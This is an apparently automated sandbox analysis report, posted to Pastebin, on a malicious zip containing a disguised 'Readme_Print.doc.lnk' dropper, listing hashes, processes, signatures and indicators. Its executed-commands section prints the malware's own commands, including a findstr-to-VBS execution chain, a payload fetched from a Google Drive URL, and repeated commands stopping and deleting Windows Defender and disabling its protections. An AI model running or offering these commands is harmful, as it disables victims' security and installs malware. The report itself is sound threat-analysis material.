paladin316

Zips_3b682290a0a9c09a213c11d1e83f87c3_zip_2019-08-05_21_30.txt

Aug 5th, 2019
2,107
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.74 KB | None | 0 0
  1.  
  2. * MalFamily: ""
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Zips_3b682290a0a9c09a213c11d1e83f87c3.zip"
  7. * File Size: 3456
  8. * File Type: "Zip archive data, at least v2.0 to extract"
  9. * SHA256: "fb4312187aabb7a3932bf8a3fe9e6cdf8cee2e2f13d33b3e1f36f87a6b937f29"
  10. * MD5: "3b682290a0a9c09a213c11d1e83f87c3"
  11. * SHA1: "a94b97c8d7bf646839d9ca71ff3efdac7c4f6ebc"
  12. * SHA512: "c18792605d5e89a44e367cdc02ab324eb724039877700cc874980fb57c0b2da87e7ff5ddc750f4c7ed135cc0eddad4baa6f3e3d5e110365c919c8b7d9c95ab9e"
  13. * CRC32: "7552F803"
  14. * SSDEEP: "96:VbK9cj8HEFXwWCCYZzYNeUiKuVBhz4+LnxoBl6Dx4rz:VbA2XphTNDnehk+1yl6W"
  15.  
  16. * Process Execution:
  17. "cmd.exe",
  18. "cmd.exe",
  19. "findstr.exe",
  20. "wscript.exe",
  21. "NaFhI.exe",
  22. "cmd.exe",
  23. "sc.exe",
  24. "cmd.exe",
  25. "sc.exe",
  26. "cmd.exe",
  27. "powershell.exe",
  28. "cmd.exe",
  29. "powershell.exe",
  30. "cmd.exe",
  31. "powershell.exe",
  32. "cmd.exe",
  33. "powershell.exe",
  34. "cmd.exe",
  35. "powershell.exe",
  36. "cmd.exe",
  37. "powershell.exe",
  38. "cmd.exe",
  39. "powershell.exe",
  40. "cmd.exe",
  41. "powershell.exe",
  42. "cmd.exe",
  43. "powershell.exe",
  44. "cmd.exe",
  45. "powershell.exe",
  46. "svchost.exe",
  47. "services.exe",
  48. "lsass.exe"
  49.  
  50.  
  51. * Executed Commands:
  52. "\"C:\\Windows\\System32\\cmd.exe\" /c copy yciBx & (findstr \"mPmHc.*\" Readme_Print.doc.lnk > \"C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs\" & \"C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs\") & iEhgd",
  53. "C:\\Users\\user\\AppData\\Local\\Temp\\Readme_Print.doc.lnk ",
  54. "findstr \"mPmHc.*\" Readme_Print.doc.lnk",
  55. "\"C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs\"",
  56. "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs\"",
  57. "C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs ",
  58. "C:\\Users\\user\\AppData\\Local\\Temp\\NaFhI.exe",
  59. "cmd.exe /c sc stop WinDefend",
  60. "cmd.exe /c sc delete WinDefend",
  61. "cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  62. "cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true",
  63. "cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true",
  64. "cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true",
  65. "cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true",
  66. "cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true",
  67. "cmd.exe /c powershell Set-MpPreference -SevereThreatDefaultAction 6",
  68. "cmd.exe /c powershell Set-MpPreference -LowThreatDefaultAction 6",
  69. "cmd.exe /c powershell Set-MpPreference -ModerateThreatDefaultAction 6",
  70. "cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true",
  71. "C:\\Windows\\system32\\svchost.exe",
  72. "sc stop WinDefend",
  73. "sc delete WinDefend",
  74. "powershell Set-MpPreference -DisableRealtimeMonitoring $true",
  75. "powershell Set-MpPreference -DisableBehaviorMonitoring $true",
  76. "powershell Set-MpPreference -DisableBlockAtFirstSeen $true",
  77. "powershell Set-MpPreference -DisableIOAVProtection $true",
  78. "powershell Set-MpPreference -DisablePrivacyMode $true",
  79. "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true",
  80. "powershell Set-MpPreference -SevereThreatDefaultAction 6",
  81. "powershell Set-MpPreference -LowThreatDefaultAction 6",
  82. "powershell Set-MpPreference -ModerateThreatDefaultAction 6",
  83. "powershell Set-MpPreference -DisableScriptScanning $true",
  84. "C:\\Windows\\system32\\lsass.exe"
  85.  
  86.  
  87. * Signatures Detected:
  88.  
  89. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
  90. "Details":
  91.  
  92. "IP": "172.217.5.78:443"
  93.  
  94.  
  95. "IP": "172.217.11.161:443"
  96.  
  97.  
  98.  
  99.  
  100. "Description": "Creates RWX memory",
  101. "Details":
  102.  
  103.  
  104. "Description": "Possible date expiration check, exits too soon after checking local time",
  105. "Details":
  106.  
  107. "process": "cmd.exe, PID 424"
  108.  
  109.  
  110.  
  111.  
  112. "Description": "Detected script timer window indicative of sleep style evasion",
  113. "Details":
  114.  
  115. "Window": "WSH-Timer"
  116.  
  117.  
  118.  
  119.  
  120. "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
  121. "Details":
  122.  
  123. "ioc": "http://crl.globalsign.net/root-r2.crl0"
  124.  
  125.  
  126.  
  127.  
  128. "Description": "Reads data out of its own binary image",
  129. "Details":
  130.  
  131. "self_read": "process: wscript.exe, pid: 2508, offset: 0x00000000, length: 0x00000040"
  132.  
  133.  
  134. "self_read": "process: wscript.exe, pid: 2508, offset: 0x000000f0, length: 0x00000018"
  135.  
  136.  
  137. "self_read": "process: wscript.exe, pid: 2508, offset: 0x000001e8, length: 0x00000078"
  138.  
  139.  
  140. "self_read": "process: wscript.exe, pid: 2508, offset: 0x00018000, length: 0x00000020"
  141.  
  142.  
  143. "self_read": "process: wscript.exe, pid: 2508, offset: 0x00018058, length: 0x00000018"
  144.  
  145.  
  146. "self_read": "process: wscript.exe, pid: 2508, offset: 0x000181a8, length: 0x00000018"
  147.  
  148.  
  149. "self_read": "process: wscript.exe, pid: 2508, offset: 0x00018470, length: 0x00000010"
  150.  
  151.  
  152. "self_read": "process: wscript.exe, pid: 2508, offset: 0x00018640, length: 0x00000012"
  153.  
  154.  
  155.  
  156.  
  157. "Description": "A process created a hidden window",
  158. "Details":
  159.  
  160. "Process": "NaFhI.exe -> cmd.exe"
  161.  
  162.  
  163. "Process": "NaFhI.exe -> cmd.exe"
  164.  
  165.  
  166. "Process": "NaFhI.exe -> cmd.exe"
  167.  
  168.  
  169. "Process": "NaFhI.exe -> cmd.exe"
  170.  
  171.  
  172. "Process": "NaFhI.exe -> cmd.exe"
  173.  
  174.  
  175. "Process": "NaFhI.exe -> cmd.exe"
  176.  
  177.  
  178. "Process": "NaFhI.exe -> cmd.exe"
  179.  
  180.  
  181. "Process": "NaFhI.exe -> cmd.exe"
  182.  
  183.  
  184. "Process": "NaFhI.exe -> cmd.exe"
  185.  
  186.  
  187. "Process": "NaFhI.exe -> cmd.exe"
  188.  
  189.  
  190. "Process": "NaFhI.exe -> cmd.exe"
  191.  
  192.  
  193. "Process": "NaFhI.exe -> cmd.exe"
  194.  
  195.  
  196.  
  197.  
  198. "Description": "File has been identified by 5 Antiviruses on VirusTotal as malicious",
  199. "Details":
  200.  
  201. "ESET-NOD32": "LNK/Agent.AJ"
  202.  
  203.  
  204. "Sophos": "Troj/LnkDrop-B"
  205.  
  206.  
  207. "VBA32": "Trojan.Link.DoubleRun"
  208.  
  209.  
  210. "Zoner": "Probably LNKScript"
  211.  
  212.  
  213. "Rising": "Trojan.Obfus/VBS!1.B96F (CLASSIC)"
  214.  
  215.  
  216.  
  217.  
  218. "Description": "Drops a binary and executes it",
  219. "Details":
  220.  
  221. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\NaFhI.exe"
  222.  
  223.  
  224.  
  225.  
  226. "Description": "Attempts to stop active services",
  227. "Details":
  228.  
  229. "servicename": "WinDefend"
  230.  
  231.  
  232.  
  233.  
  234. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  235. "Details":
  236.  
  237. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 6580148 times"
  238.  
  239.  
  240. "Spam": "NaFhI.exe (2212) called API GetSystemTimeAsFileTime 258088 times"
  241.  
  242.  
  243.  
  244.  
  245. "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
  246. "Details":
  247.  
  248. "modified_name": "svchost.exe",
  249. "modified_path": "C:\\Users\\user\\AppData\\Local\\Temp\\NaFhI.exe",
  250. "original_name": "svchost.exe",
  251. "original_path": "C:\\Windows\\system32\\svchost.exe"
  252.  
  253.  
  254.  
  255.  
  256. "Description": "Creates a hidden or system file",
  257. "Details":
  258.  
  259. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436a4d.TMP"
  260.  
  261.  
  262. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43bd00.TMP"
  263.  
  264.  
  265. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436d5a.TMP"
  266.  
  267.  
  268. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436f6d.TMP"
  269.  
  270.  
  271. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF4370a6.TMP"
  272.  
  273.  
  274. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d51c.TMP"
  275.  
  276.  
  277. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d5a9.TMP"
  278.  
  279.  
  280. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF437d58.TMP"
  281.  
  282.  
  283. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d9ef.TMP"
  284.  
  285.  
  286. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF438046.TMP"
  287.  
  288.  
  289.  
  290.  
  291. "Description": "A wscript.exe process commonly used in script or document file downloaders initiated network activity",
  292. "Details":
  293.  
  294. "http_request": "wscript.exe_InternetCrackUrlW_https://docs.google.com/uc?export=download&id=1eum9c8esmtdi0ggcoz2f0vdpz_qq-u-5"
  295.  
  296.  
  297. "http_request": "wscript.exe_InternetCrackUrlW_https://doc-08-9s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/u4fkj9o4s7g6u1s9fves9fg0q35rslbe/1565035200000/01776086037526790667/*/1eum9c8esmtdi0ggcoz2f0vdpz_qq-u-5?e=download"
  298.  
  299.  
  300. "http_request": "wscript.exe_InternetCrackUrlA_https://docs.google.com"
  301.  
  302.  
  303. "http_request": "wscript.exe_InternetCrackUrlA_https://doc-08-9s-docs.googleusercontent.com"
  304.  
  305.  
  306.  
  307.  
  308. "Description": "Attempts to modify proxy settings",
  309. "Details":
  310.  
  311.  
  312. "Description": "Attempts to disable Windows Defender",
  313. "Details":
  314.  
  315.  
  316.  
  317. * Started Service:
  318. "KeyIso"
  319.  
  320.  
  321. * Mutexes:
  322. "Local\\ZoneAttributeCacheCounterMutex",
  323. "Local\\ZonesCacheCounterMutex",
  324. "Local\\ZonesLockedCacheCounterMutex",
  325. "Local\\!IETld!Mutex",
  326. "Global\\CLR_CASOFF_MUTEX",
  327. "Global\\838B6C9EB27932960"
  328.  
  329.  
  330. * Modified Files:
  331. "C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs",
  332. "C:\\Users\\user\\AppData\\Local\\Temp\\NaFhI.exe",
  333. "C:\\Users\\user\\AppData\\Local\\Temp\\~DFB16BD84282157EAF.TMP",
  334. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  335. "\\??\\PIPE\\srvsvc",
  336. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7E3PQJ5WHV6MLRHPBRPS.temp",
  337. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436a4d.TMP",
  338. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\TD1UKG17J5GXDRN5BU1T.temp",
  339. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43bd00.TMP",
  340. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\H0LZ2OK9UEYG88G5J3XN.temp",
  341. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436d5a.TMP",
  342. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\YY3IJHVTOT3SB57LSQPN.temp",
  343. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436f6d.TMP",
  344. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\T4LQLIMM7CO9W9VMIX7D.temp",
  345. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF4370a6.TMP",
  346. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\0TJLF8DOXAPTJM2HTVAU.temp",
  347. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d51c.TMP",
  348. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\8QJ5RMGOL5Y5M38QB6QN.temp",
  349. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d5a9.TMP",
  350. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\IAHJINXL1U49RNKR6KHS.temp",
  351. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF437d58.TMP",
  352. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\9JQU92UM68VH8YZ2O8QP.temp",
  353. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d9ef.TMP",
  354. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\LJJIB65CTJMHNRR24J53.temp",
  355. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF438046.TMP"
  356.  
  357.  
  358. * Deleted Files:
  359. "C:\\Users\\user\\AppData\\Local\\Temp\\InYQc.vbs",
  360. "C:\\Users\\user\\AppData\\Local\\Temp\\~DFB16BD84282157EAF.TMP",
  361. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436a4d.TMP",
  362. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1396.4418890",
  363. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1396.4418890",
  364. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1396.4418890",
  365. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43bd00.TMP",
  366. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1924.4439453",
  367. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1924.4439453",
  368. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1924.4439453",
  369. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436d5a.TMP",
  370. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.2972.4420625",
  371. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2972.4420625",
  372. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.2972.4420625",
  373. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF436f6d.TMP",
  374. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.2464.4421359",
  375. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2464.4421359",
  376. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.2464.4421359",
  377. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF4370a6.TMP",
  378. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.2908.4422453",
  379. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2908.4422453",
  380. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.2908.4422453",
  381. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d51c.TMP",
  382. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.788.4445593",
  383. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.788.4445609",
  384. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.788.4445609",
  385. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d5a9.TMP",
  386. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.2872.4445781",
  387. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2872.4445781",
  388. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.2872.4445781",
  389. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF437d58.TMP",
  390. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.832.4426843",
  391. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.832.4426843",
  392. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.832.4426843",
  393. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF43d9ef.TMP",
  394. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.3084.4446828",
  395. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3084.4446843",
  396. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.3084.4446843",
  397. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF438046.TMP",
  398. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.3140.4427328",
  399. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3140.4427328",
  400. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.3140.4427328"
  401.  
  402.  
  403. * Modified Registry Keys:
  404. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  405. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  406. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  407. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
  408. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
  409. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
  410. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
  411. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
  412. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
  413. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
  414. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
  415. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScanOnRealtimeEnable",
  416. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection"
  417.  
  418.  
  419. * Deleted Registry Keys:
  420. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  421. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  422. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  423. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  424. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
  425. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL"
  426.  
  427.  
  428. * DNS Communications:
  429.  
  430. "type": "A",
  431. "request": "doc-08-9s-docs.googleusercontent.com",
  432. "answers":
  433.  
  434. "data": "googlehosted.l.googleusercontent.com",
  435. "type": "CNAME"
  436.  
  437.  
  438. "data": "172.217.11.161",
  439. "type": "A"
  440.  
  441.  
  442.  
  443.  
  444.  
  445. * Domains:
  446.  
  447. "ip": "172.217.11.65",
  448. "domain": "doc-08-9s-docs.googleusercontent.com"
  449.  
  450.  
  451.  
  452. * Network Communication - ICMP:
  453.  
  454. * Network Communication - HTTP:
  455.  
  456. * Network Communication - SMTP:
  457.  
  458. * Network Communication - Hosts:
  459.  
  460. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment